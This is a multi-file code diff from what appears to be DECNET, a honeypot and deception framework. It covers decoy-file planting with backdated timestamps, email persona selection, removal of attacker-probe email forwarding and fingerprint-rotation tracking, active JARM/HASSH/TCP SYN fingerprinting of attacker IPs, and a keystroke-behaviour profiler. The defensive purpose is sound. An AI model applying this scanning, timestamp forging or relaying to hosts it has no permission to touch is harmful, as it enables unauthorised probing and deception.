|
||||
conn.sendmail(envelope_from, rcpt_to, body)
|
||||
return True, ""
|
||||
except Exception as exc:
|
||||
return False, str(exc)[:256]
|
||||
@@ -18,8 +18,11 @@ or IP can't escape into a shell.
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import shlex
|
||||
from typing import Any
|
||||
from datetime import datetime
|
||||
|
||||
import base64
|
||||
from datetime import datetime, timezone
|
||||
|
||||
from decnet.logging import get_logger
|
||||
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
|
||||
@@ -223,24 +226,36 @@ class SSHDriver(ActivityDriver):
|
||||
) -> ActivityResult:
|
||||
"""Write *content* to *path* inside *decky_name*'s ssh container.
|
||||
|
||||
Delegates to :func:`decnet.decky_io.write_file_to_container`,
|
||||
which carries the ARG_MAX-safe base64-via-stdin trick. Sets
|
||||
file mode and, when *mtime* is provided, ``touch -d`` to
|
||||
backdate the file (otherwise everything stamps at wall-clock-now
|
||||
— the realism failure this path was originally fixing).
|
||||
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
|
||||
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and,
|
||||
when *mtime* is provided, ``touch -d`` to backdate the file so
|
||||
it doesn't all stamp at wall-clock-now (the realism failure
|
||||
this migration is fixing).
|
||||
"""
|
||||
from decnet.decky_io import write_file_to_container
|
||||
|
||||
container = _container_for(decky_name)
|
||||
success, error = await write_file_to_container(
|
||||
container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
|
||||
b64 = base64.b64encode(content).decode("ascii")
|
||||
# touch -d accepts ISO 8601; we always emit UTC so the
|
||||
# container's local TZ doesn't drift the mtime.
|
||||
if mtime is not None:
|
||||
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
|
||||
else:
|
||||
touch_cmd = f"touch {shlex.quote(path)}"
|
||||
sh_cmd = (
|
||||
f"mkdir -p {shlex.quote(_dirname(path))} && "
|
||||
f"base64 -d > {shlex.quote(path)} && "
|
||||
f"chmod {mode:o} {shlex.quote(path)} && "
|
||||
f"{touch_cmd}"
|
||||
)
|
||||
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
|
||||
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
|
||||
success = rc == 0
|
||||
payload: dict[str, Any] = {
|
||||
"dst_decky": decky_name,
|
||||
"path": path,
|
||||
"bytes": len(content),
|
||||
"rc": 0 if success else 1,
|
||||
"stderr": error if not success else None,
|
||||
"rc": rc,
|
||||
"stderr": stderr.strip()[:256] if not success else None,
|
||||
}
|
||||
return ActivityResult(success=success, payload=payload)
|
||||
|
||||
@@ -268,3 +283,11 @@ class SSHDriver(ActivityDriver):
|
||||
)
|
||||
|
||||
|
||||
def _dirname(path: str) -> str:
|
||||
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
|
||||
host to share the destination container's separator semantics, but
|
||||
deckies are POSIX so a plain ``rfind('/')`` suffices."""
|
||||
idx = path.rfind("/")
|
||||
if idx <= 0:
|
||||
return "/"
|
||||
return path[:idx]
|
||||
|
||||
@@ -131,13 +131,13 @@ async def _resolve_personas(
|
||||
topology = await repo.get_topology(topology_id)
|
||||
if not topology:
|
||||
return [], source
|
||||
if isinstance(topology, dict):
|
||||
raw = topology.get("email_personas")
|
||||
lang = topology.get("language_default") or "en"
|
||||
else:
|
||||
raw = topology.email_personas
|
||||
lang = topology.language_default or "en"
|
||||
return parse_personas(raw, language_default=lang), source
|
||||
return (
|
||||
parse_personas(
|
||||
topology.get("email_personas"),
|
||||
language_default=topology.get("language_default") or "en",
|
||||
),
|
||||
source,
|
||||
)
|
||||
# Fleet / shard / anything else → global pool.
|
||||
return global_pool.load(), source
|
||||
|
||||
@@ -175,7 +175,7 @@ async def pick(
|
||||
)
|
||||
return None
|
||||
|
||||
active = [p for p in personas if in_active_hours(p, now_dt)]
|
||||
active = [p for p in personas if in_active_hours(p, now_dt.hour)]
|
||||
if len(active) < 2:
|
||||
logger.debug(
|
||||
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
|
||||
|
||||
@@ -311,22 +311,17 @@ async def _resolve_personas(
|
||||
return enriched
|
||||
|
||||
|
||||
def _topology_personas(topology) -> list[EmailPersona]:
|
||||
def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]:
|
||||
if not topology:
|
||||
return []
|
||||
if isinstance(topology, dict):
|
||||
raw = topology.get("email_personas")
|
||||
lang = topology.get("language_default") or "en"
|
||||
else:
|
||||
raw = topology.email_personas
|
||||
lang = topology.language_default or "en"
|
||||
raw = topology.get("email_personas")
|
||||
if raw is None:
|
||||
return []
|
||||
if isinstance(raw, list):
|
||||
return parse_personas(raw, language_default=lang)
|
||||
return parse_personas(raw, language_default=topology.get("language_default") or "en")
|
||||
if isinstance(raw, str):
|
||||
try:
|
||||
return parse_personas(json.loads(raw), language_default=lang)
|
||||
return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en")
|
||||
except json.JSONDecodeError:
|
||||
return []
|
||||
return []
|
||||
|
||||
@@ -25,7 +25,6 @@ import secrets
|
||||
from datetime import datetime, timezone
|
||||
from typing import Any, Optional
|
||||
|
||||
from decnet.bus import topics as _topics
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.bus.publish import (
|
||||
publish_safely,
|
||||
@@ -35,7 +34,6 @@ from decnet.bus.publish import (
|
||||
from decnet.logging import get_logger
|
||||
from decnet.orchestrator import events, scheduler
|
||||
from decnet.orchestrator.drivers import get_driver_for
|
||||
from decnet.orchestrator.drivers.smtp_relay import forward_probe
|
||||
from decnet.orchestrator.emailgen import (
|
||||
events as email_events,
|
||||
scheduler as email_scheduler,
|
||||
@@ -129,7 +127,6 @@ async def orchestrator_worker(
|
||||
# operator's intent rather than the baked-in defaults. A failure
|
||||
# here logs and falls through; the planner already holds defaults.
|
||||
await _refresh_realism_config(repo)
|
||||
await _refresh_llm_config(repo)
|
||||
|
||||
shutdown = asyncio.Event()
|
||||
heartbeat_task = asyncio.create_task(
|
||||
@@ -141,9 +138,6 @@ async def orchestrator_worker(
|
||||
control_task = asyncio.create_task(
|
||||
run_control_listener(bus, "orchestrator", shutdown),
|
||||
)
|
||||
probe_task = asyncio.create_task(
|
||||
_run_smtp_probe_listener(repo, shutdown),
|
||||
)
|
||||
tick_n = 0
|
||||
try:
|
||||
while not shutdown.is_set():
|
||||
@@ -162,9 +156,8 @@ async def orchestrator_worker(
|
||||
await _periodic_prune(repo)
|
||||
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
|
||||
await _refresh_realism_config(repo)
|
||||
await _refresh_llm_config(repo)
|
||||
finally:
|
||||
for t in (heartbeat_task, control_task, probe_task):
|
||||
for t in (heartbeat_task, control_task):
|
||||
t.cancel()
|
||||
with contextlib.suppress(Exception, asyncio.CancelledError):
|
||||
await t
|
||||
@@ -225,18 +218,6 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
|
||||
logger.warning("realism config refresh: rejected payload: %s", exc)
|
||||
|
||||
|
||||
async def _refresh_llm_config(repo: BaseRepository) -> None:
|
||||
"""Pull operator-tuned LLM config from realism_config into the backend cache."""
|
||||
from decnet.realism.llm.config import apply, load_from_db
|
||||
cfg = await load_from_db(repo)
|
||||
if cfg is None:
|
||||
return
|
||||
try:
|
||||
apply(cfg)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
logger.warning("llm config refresh: apply failed: %s", exc)
|
||||
|
||||
|
||||
def _roll_action_kind(rng: secrets.SystemRandom) -> str:
|
||||
total = sum(w for _, w in _ACTION_WEIGHTS)
|
||||
target = rng.randint(1, total)
|
||||
@@ -322,7 +303,7 @@ async def _pick_action(
|
||||
)
|
||||
elif kind == "email":
|
||||
try:
|
||||
action = await email_scheduler.pick(repo, rand=rng) # type: ignore[assignment]
|
||||
action = await email_scheduler.pick(repo, rand=rng)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
logger.debug("orchestrator: email pick failed: %s", exc)
|
||||
action = None
|
||||
@@ -486,100 +467,6 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
|
||||
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
|
||||
|
||||
|
||||
async def _run_smtp_probe_listener(
|
||||
repo: BaseRepository,
|
||||
shutdown: asyncio.Event,
|
||||
) -> None:
|
||||
"""Subscribe to smtp.probe.pending and forward probe emails upstream.
|
||||
|
||||
Runs as a long-lived subtask alongside the tick loop. When a probe lands
|
||||
we check if this (attacker_ip, decky) has already been forwarded up to
|
||||
probe_limit times — if not, forward via the master's real internet
|
||||
connection and store a probe_relay bounty with the result.
|
||||
"""
|
||||
try:
|
||||
bus = get_bus(client_name="orchestrator-probe")
|
||||
await bus.connect()
|
||||
sub = bus.subscribe(_topics.smtp("probe.pending"))
|
||||
async with sub:
|
||||
async for event in sub:
|
||||
if shutdown.is_set():
|
||||
break
|
||||
try:
|
||||
await _handle_probe_pending(repo, event.payload)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
logger.warning("smtp probe listener: handle error: %s", exc)
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
except Exception as exc: # noqa: BLE001
|
||||
logger.warning("smtp probe listener: bus unavailable: %s", exc)
|
||||
finally:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
|
||||
|
||||
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
|
||||
decky_name = (payload.get("decky") or "").strip()
|
||||
attacker_ip = (payload.get("attacker_ip") or "").strip()
|
||||
stored_as = (payload.get("stored_as") or "").strip()
|
||||
mail_from = (payload.get("mail_from") or "").strip()
|
||||
rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
|
||||
|
||||
if not (decky_name and attacker_ip and stored_as):
|
||||
return
|
||||
|
||||
decky_row = await repo.get_fleet_decky_by_name(decky_name)
|
||||
if not decky_row:
|
||||
return
|
||||
svc_cfg = (
|
||||
(decky_row.get("decky_config") or {})
|
||||
.get("service_config", {})
|
||||
.get("smtp_relay") or {}
|
||||
)
|
||||
if not (svc_cfg.get("upstream_host") or "").strip():
|
||||
return
|
||||
|
||||
probe_limit = int(svc_cfg.get("probe_limit") or 1)
|
||||
already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
|
||||
if already_sent >= probe_limit:
|
||||
return
|
||||
|
||||
rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
|
||||
artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||
|
||||
loop = asyncio.get_event_loop()
|
||||
ok, reason = await loop.run_in_executor(
|
||||
None,
|
||||
lambda: forward_probe(
|
||||
svc_cfg=svc_cfg,
|
||||
stored_as=stored_as,
|
||||
decky_name=decky_name,
|
||||
mail_from=mail_from,
|
||||
rcpt_to=rcpt_to,
|
||||
artifacts_root=artifacts_root,
|
||||
),
|
||||
)
|
||||
|
||||
await repo.add_bounty({
|
||||
"decky": decky_name,
|
||||
"service": "smtp_relay",
|
||||
"attacker_ip": attacker_ip,
|
||||
"bounty_type": "probe_relay",
|
||||
"payload": {
|
||||
"stored_as": stored_as,
|
||||
"forwarded": ok,
|
||||
**({"fwd_error": reason} if not ok else {}),
|
||||
},
|
||||
})
|
||||
if ok:
|
||||
logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
|
||||
else:
|
||||
logger.warning(
|
||||
"smtp probe forward failed decky=%s ip=%s error=%s",
|
||||
decky_name, attacker_ip, reason,
|
||||
)
|
||||
|
||||
|
||||
async def _record_synthetic_file(repo, action) -> None:
|
||||
"""Persist (or patch) a synthetic_files row after a FileAction plant.
|
||||
|
||||
|
||||
@@ -48,7 +48,7 @@ def _send_syn(
|
||||
Craft a TCP SYN with common options and send it. Returns the
|
||||
SYN-ACK response packet or None on timeout/failure.
|
||||
"""
|
||||
from scapy.all import IP, TCP, conf, sr1 # type: ignore[attr-defined]
|
||||
from scapy.all import IP, TCP, conf, sr1
|
||||
|
||||
# Suppress scapy's noisy output
|
||||
conf.verb = 0
|
||||
@@ -83,7 +83,7 @@ def _send_syn(
|
||||
return None
|
||||
|
||||
# Verify it's a SYN-ACK (flags == 0x12)
|
||||
from scapy.all import TCP as TCPLayer # type: ignore[attr-defined]
|
||||
from scapy.all import TCP as TCPLayer
|
||||
if not resp.haslayer(TCPLayer):
|
||||
return None
|
||||
if resp[TCPLayer].flags != 0x12: # SYN-ACK
|
||||
@@ -103,7 +103,7 @@ def _send_rst(
|
||||
) -> None:
|
||||
"""Send RST to clean up the half-open connection."""
|
||||
try:
|
||||
from scapy.all import IP, TCP, send # type: ignore[attr-defined]
|
||||
from scapy.all import IP, TCP, send
|
||||
rst = (
|
||||
IP(dst=host)
|
||||
/ TCP(
|
||||
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
|
||||
"""
|
||||
Extract fingerprint fields from a scapy SYN-ACK response packet.
|
||||
"""
|
||||
from scapy.all import IP, TCP # type: ignore[attr-defined]
|
||||
from scapy.all import IP, TCP
|
||||
|
||||
ip_layer = resp[IP]
|
||||
tcp_layer = resp[TCP]
|
||||
|
||||
@@ -27,9 +27,6 @@ from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
from typing import Any, Callable
|
||||
|
||||
from sqlalchemy.engine import Engine
|
||||
from sqlmodel import Session
|
||||
|
||||
from decnet.bus import topics as _topics
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.bus.factory import get_bus
|
||||
@@ -38,10 +35,6 @@ from decnet.bus.publish import (
|
||||
run_control_listener,
|
||||
run_health_heartbeat,
|
||||
)
|
||||
from decnet.correlation.fingerprint_rotation import (
|
||||
ProbeType,
|
||||
record_fingerprint,
|
||||
)
|
||||
from decnet.logging import get_logger
|
||||
from decnet.prober.hassh import hassh_server
|
||||
from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
|
||||
@@ -51,21 +44,6 @@ from decnet.telemetry import traced as _traced
|
||||
|
||||
logger = get_logger("prober")
|
||||
|
||||
|
||||
def _build_sync_engine() -> Engine:
|
||||
"""Construct a sync SQLite engine for rotation-detection state.
|
||||
|
||||
Used inline by the prober; it lives outside the async repository
|
||||
layer because rotation detection is a sync hook on a sync probe
|
||||
path. Honors the same defaulting as
|
||||
``decnet.web.db.sqlite.repository.SQLiteRepository``.
|
||||
"""
|
||||
import os
|
||||
from decnet.config import _ROOT
|
||||
from decnet.web.db.sqlite.database import get_sync_engine
|
||||
db_path = os.environ.get("DECNET_DB_PATH", str(_ROOT / "decnet.db"))
|
||||
return get_sync_engine(db_path)
|
||||
|
||||
# ─── Default ports per probe type ───────────────────────────────────────────
|
||||
|
||||
# JARM: common C2 callback / TLS server ports
|
||||
@@ -255,14 +233,6 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:
|
||||
|
||||
ProbePublishFn = Callable[[str, dict[str, Any]], None]
|
||||
|
||||
# Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
|
||||
# performs the rotation-detection upsert + derived-event emission for the
|
||||
# DEBT-032 substrate-fingerprint flow. Optional; when None the prober
|
||||
# behaves exactly as before (raw fingerprint emit only, no rotation
|
||||
# detection). Construction lives at worker startup so phase functions
|
||||
# don't have to know about the DB engine.
|
||||
RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
|
||||
|
||||
|
||||
@_traced("prober.probe_cycle")
|
||||
def _probe_cycle(
|
||||
@@ -275,7 +245,6 @@ def _probe_cycle(
|
||||
json_path: Path,
|
||||
timeout: float = 5.0,
|
||||
publish_fn: ProbePublishFn | None = None,
|
||||
record_rotation: RotationRecorderFn | None = None,
|
||||
) -> None:
|
||||
"""
|
||||
Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
|
||||
@@ -294,13 +263,13 @@ def _probe_cycle(
|
||||
ip_probed = probed.setdefault(ip, {})
|
||||
|
||||
# Phase 1: JARM (TLS fingerprinting)
|
||||
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn)
|
||||
|
||||
# Phase 2: HASSHServer (SSH fingerprinting)
|
||||
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn)
|
||||
|
||||
# Phase 3: TCP/IP stack fingerprinting
|
||||
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn)
|
||||
|
||||
|
||||
@_traced("prober.jarm_phase")
|
||||
@@ -312,7 +281,6 @@ def _jarm_phase(
|
||||
json_path: Path,
|
||||
timeout: float,
|
||||
publish_fn: ProbePublishFn | None = None,
|
||||
record_rotation: RotationRecorderFn | None = None,
|
||||
) -> None:
|
||||
"""JARM-fingerprint an IP on the given TLS ports."""
|
||||
done = ip_probed.setdefault("jarm", set())
|
||||
@@ -333,8 +301,6 @@ def _jarm_phase(
|
||||
msg=f"JARM {ip}:{port} = {h}",
|
||||
)
|
||||
logger.info("prober: JARM %s:%d = %s", ip, port, h)
|
||||
if record_rotation is not None:
|
||||
record_rotation(ip, port, "jarm", h)
|
||||
if publish_fn is not None:
|
||||
publish_fn(
|
||||
"jarm",
|
||||
@@ -421,7 +387,6 @@ def _hassh_phase(
|
||||
json_path: Path,
|
||||
timeout: float,
|
||||
publish_fn: ProbePublishFn | None = None,
|
||||
record_rotation: RotationRecorderFn | None = None,
|
||||
) -> None:
|
||||
"""HASSHServer-fingerprint an IP on the given SSH ports."""
|
||||
done = ip_probed.setdefault("hassh", set())
|
||||
@@ -447,8 +412,6 @@ def _hassh_phase(
|
||||
msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
|
||||
)
|
||||
logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
|
||||
if record_rotation is not None:
|
||||
record_rotation(ip, port, "hassh", result["hassh_server"])
|
||||
if publish_fn is not None:
|
||||
publish_fn(
|
||||
"hassh",
|
||||
@@ -482,7 +445,6 @@ def _tcpfp_phase(
|
||||
json_path: Path,
|
||||
timeout: float,
|
||||
publish_fn: ProbePublishFn | None = None,
|
||||
record_rotation: RotationRecorderFn | None = None,
|
||||
) -> None:
|
||||
"""TCP/IP stack fingerprint an IP on the given ports."""
|
||||
done = ip_probed.setdefault("tcpfp", set())
|
||||
@@ -516,8 +478,6 @@ def _tcpfp_phase(
|
||||
msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
|
||||
)
|
||||
logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
|
||||
if record_rotation is not None:
|
||||
record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
|
||||
if publish_fn is not None:
|
||||
publish_fn(
|
||||
"tcpfp",
|
||||
@@ -626,61 +586,6 @@ async def prober_worker(
|
||||
event_type,
|
||||
)
|
||||
|
||||
# Substrate-rotation detection (DEBT-032) — open a sync engine for
|
||||
# the prober's lifetime; recorder closes a session per call so we
|
||||
# never hold a connection across phase boundaries. Failure to
|
||||
# connect is non-fatal: probes continue, rotation detection is
|
||||
# silently disabled.
|
||||
rotation_engine: Engine | None = None
|
||||
record_rotation: RotationRecorderFn | None = None
|
||||
try:
|
||||
rotation_engine = _build_sync_engine()
|
||||
except Exception as exc: # noqa: BLE001
|
||||
logger.warning(
|
||||
"prober: rotation-detection DB unavailable, "
|
||||
"running with rotation detection disabled: %s", exc,
|
||||
)
|
||||
|
||||
if rotation_engine is not None:
|
||||
def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
|
||||
raw_publish(
|
||||
_topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
|
||||
payload,
|
||||
event_type,
|
||||
)
|
||||
|
||||
def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
|
||||
_write_event(
|
||||
log_path, json_path,
|
||||
"fingerprint_rotated",
|
||||
target_ip=payload["attacker_ip"],
|
||||
target_port=str(payload["port"]),
|
||||
probe_type=payload["probe_type"],
|
||||
old_hash=payload.get("old_hash") or "",
|
||||
new_hash=payload["new_hash"],
|
||||
rotation_count=str(payload["rotation_count"]),
|
||||
msg=(
|
||||
f"FP rotation {payload['attacker_ip']}:{payload['port']} "
|
||||
f"{payload['probe_type']} {payload.get('old_hash')} → "
|
||||
f"{payload['new_hash']}"
|
||||
),
|
||||
)
|
||||
|
||||
def record_rotation(
|
||||
ip: str, port: int, probe_type: ProbeType, new_hash: str,
|
||||
) -> None:
|
||||
with Session(rotation_engine) as session:
|
||||
record_fingerprint(
|
||||
session,
|
||||
attacker_ip=ip,
|
||||
port=port,
|
||||
probe_type=probe_type,
|
||||
new_hash=new_hash,
|
||||
ts=datetime.now(timezone.utc),
|
||||
publish_fn=_publish_rotation,
|
||||
syslog_fn=_syslog_rotation,
|
||||
)
|
||||
|
||||
shutdown = asyncio.Event()
|
||||
heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
|
||||
control_task = asyncio.create_task(
|
||||
@@ -707,7 +612,6 @@ async def prober_worker(
|
||||
jarm_ports, hassh_ports, tcp_ports,
|
||||
log_path, json_path, timeout,
|
||||
_publish_attacker,
|
||||
record_rotation,
|
||||
)
|
||||
|
||||
try:
|
||||
@@ -722,6 +626,3 @@ async def prober_worker(
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
if rotation_engine is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
rotation_engine.dispose()
|
||||
|
||||
@@ -1,25 +0,0 @@
|
||||
"""BEHAVE-SHELL extraction engine — DECNET's official implementation.
|
||||
|
||||
Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
|
||||
library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
|
||||
emission, and persistence. The engine just turns one PTY session into
|
||||
``Iterable[Observation]``.
|
||||
|
||||
BEHAVE is the spec; DECNET is the engine.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.profiler.behave_shell.extract import (
|
||||
DEFAULT_SOURCE,
|
||||
build_context,
|
||||
extract_session,
|
||||
)
|
||||
|
||||
# Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
|
||||
# emit; calibration grid honest). The ``-pre`` suffix stays until
|
||||
# ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
|
||||
# table writes + AttackerDetail panel; only then does H.5 proper drop the
|
||||
# suffix and tag v0.
|
||||
__version__ = "0.1.0-pre"
|
||||
|
||||
__all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]
|
||||
@@ -1,573 +0,0 @@
|
||||
"""SessionContext: precomputed bundle every feature function reads from.
|
||||
|
||||
A naïve engine re-walks the event stream once per primitive. We don't
|
||||
do that — one walk over the events builds this context, every feature
|
||||
reads from it. Adding a new feature is O(1) cost on the parse side.
|
||||
|
||||
Step 1 fills ``iats`` (inter-key intervals between input events) and
|
||||
``paste_bursts`` (contiguous runs of paste-class events). Step 4
|
||||
will fill ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import math
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Iterable, Mapping
|
||||
|
||||
from decnet.profiler.behave_shell._intent import (
|
||||
LEXEME_MAX_LEN,
|
||||
NEGATIVE_LEXEMES,
|
||||
OBSCENITY_LEXEMES,
|
||||
POSITIVE_LEXEMES,
|
||||
)
|
||||
from decnet.profiler.behave_shell._parse import (
|
||||
AsciinemaEvent,
|
||||
Command,
|
||||
PasteBurst,
|
||||
PromptLine,
|
||||
detect_error_in_output,
|
||||
extract_prompt_lines,
|
||||
hash_token,
|
||||
strip_ansi,
|
||||
)
|
||||
from decnet.profiler.behave_shell._thresholds import (
|
||||
IKI_THINK_MAX_S,
|
||||
LAYOUT_BIGRAM_TOP_N,
|
||||
PASTE_BURST_MAX_IAT_S,
|
||||
PASTE_MIN_CHARS_PER_EVENT,
|
||||
PROMPT_LINE_MAX_CHARS,
|
||||
SHORTCUT_CTRL_BYTES,
|
||||
)
|
||||
|
||||
|
||||
@dataclass(frozen=True, slots=True)
|
||||
class _LexCounters:
|
||||
"""Lexical counters from the typed-text walk (G.0).
|
||||
|
||||
Internal to the ctx-builder; flattened onto SessionContext fields
|
||||
in :func:`build_session_context`.
|
||||
"""
|
||||
obscenity_hits: int = 0
|
||||
positive_lex_hits: int = 0
|
||||
negative_lex_hits: int = 0
|
||||
caps_run_max: int = 0
|
||||
bang_run_max: int = 0
|
||||
|
||||
|
||||
@dataclass(frozen=True, slots=True)
|
||||
class SessionContext:
|
||||
sid: str
|
||||
source: str
|
||||
evidence_ref: str
|
||||
t_start: float
|
||||
t_end: float
|
||||
duration_s: float
|
||||
|
||||
input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
|
||||
output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
|
||||
|
||||
# Step 1 derivations
|
||||
iats: tuple[float, ...] = field(default_factory=tuple)
|
||||
paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
|
||||
paste_event_count: int = 0
|
||||
|
||||
# Step 4 derivations — command segmentation
|
||||
commands: tuple[Command, ...] = field(default_factory=tuple)
|
||||
inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
|
||||
output_per_cmd: tuple[int, ...] = field(default_factory=tuple)
|
||||
|
||||
# Step B.1 derivations — typing bursts (IATs split at think-pauses)
|
||||
typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
|
||||
|
||||
# Step B.3 derivations — error-correction signals
|
||||
backspace_count: int = 0
|
||||
backspace_iats: tuple[float, ...] = field(default_factory=tuple)
|
||||
kill_line_count: int = 0
|
||||
|
||||
# Step B.4 derivations — per-command intra-typing IATs
|
||||
intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
|
||||
|
||||
# Step F.0 derivations — PS1 prompt lines detected in the output stream
|
||||
prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)
|
||||
|
||||
# Step F.4 derivations — typed-only character histograms for keyboard
|
||||
# layout fingerprinting (PII boundary lifted by ANTI for Phase F).
|
||||
typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
|
||||
typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
|
||||
typed_letter_count: int = 0
|
||||
|
||||
# Step G.0 derivations — lexical counters from the same single-pass
|
||||
# typed-text walk. No raw text retained; only fixed-vocabulary
|
||||
# membership counts and run-lengths. Drives valence (G.5), arousal
|
||||
# (G.6), and frustration_venting (G.8).
|
||||
obscenity_hits: int = 0
|
||||
positive_lex_hits: int = 0
|
||||
negative_lex_hits: int = 0
|
||||
caps_run_max: int = 0
|
||||
bang_run_max: int = 0
|
||||
|
||||
|
||||
def _detect_paste_bursts(
|
||||
inputs: list[AsciinemaEvent],
|
||||
) -> tuple[tuple[PasteBurst, ...], int]:
|
||||
"""Group consecutive paste-class input events into PasteBursts.
|
||||
|
||||
A paste-class event is one with ``len(data) >= PASTE_MIN_CHARS_PER_EVENT``.
|
||||
Two adjacent paste-class events collapse into the same burst when
|
||||
their IAT is within ``PASTE_BURST_MAX_IAT_S``; otherwise a new
|
||||
burst opens. Returns the bursts and the total count of paste-class
|
||||
events (the same number ``BEHAVE`` prototype calls ``paste_events``).
|
||||
"""
|
||||
bursts: list[PasteBurst] = []
|
||||
paste_count = 0
|
||||
|
||||
cur_start: float | None = None
|
||||
cur_end: float = 0.0
|
||||
cur_chars: int = 0
|
||||
cur_events: int = 0
|
||||
last_t: float | None = None
|
||||
|
||||
def _close() -> None:
|
||||
nonlocal cur_start, cur_end, cur_chars, cur_events
|
||||
if cur_start is not None and cur_events > 0:
|
||||
bursts.append(PasteBurst(
|
||||
start_ts=cur_start,
|
||||
end_ts=cur_end,
|
||||
char_count=cur_chars,
|
||||
event_count=cur_events,
|
||||
))
|
||||
cur_start = None
|
||||
cur_end = 0.0
|
||||
cur_chars = 0
|
||||
cur_events = 0
|
||||
|
||||
for t, _kind, data in inputs:
|
||||
is_paste = len(data) >= PASTE_MIN_CHARS_PER_EVENT
|
||||
if is_paste:
|
||||
paste_count += 1
|
||||
if cur_start is None or (
|
||||
last_t is not None and (t - last_t) > PASTE_BURST_MAX_IAT_S
|
||||
):
|
||||
_close()
|
||||
cur_start = t
|
||||
cur_end = t
|
||||
cur_chars += len(data)
|
||||
cur_events += 1
|
||||
else:
|
||||
_close()
|
||||
last_t = t
|
||||
|
||||
_close()
|
||||
return tuple(bursts), paste_count
|
||||
|
||||
|
||||
_BACKSPACE_CHARS = ("\x7f", "\x08")
|
||||
_KILL_LINE_CHARS = ("\x15", "\x17")
|
||||
|
||||
|
||||
def _scan_correction_signals(
|
||||
inputs: list[AsciinemaEvent],
|
||||
) -> tuple[int, tuple[float, ...], int]:
|
||||
"""Walk input events char-by-char, count backspaces / kill-lines /
|
||||
timing IATs.
|
||||
|
||||
PII discipline: only counts and IATs leave this function — no
|
||||
character data is retained or returned.
|
||||
"""
|
||||
backspace_count = 0
|
||||
kill_line_count = 0
|
||||
iats: list[float] = []
|
||||
last_non_bs_t: float | None = None
|
||||
for t, _kind, data in inputs:
|
||||
for c in data:
|
||||
if c in _BACKSPACE_CHARS:
|
||||
backspace_count += 1
|
||||
if last_non_bs_t is not None:
|
||||
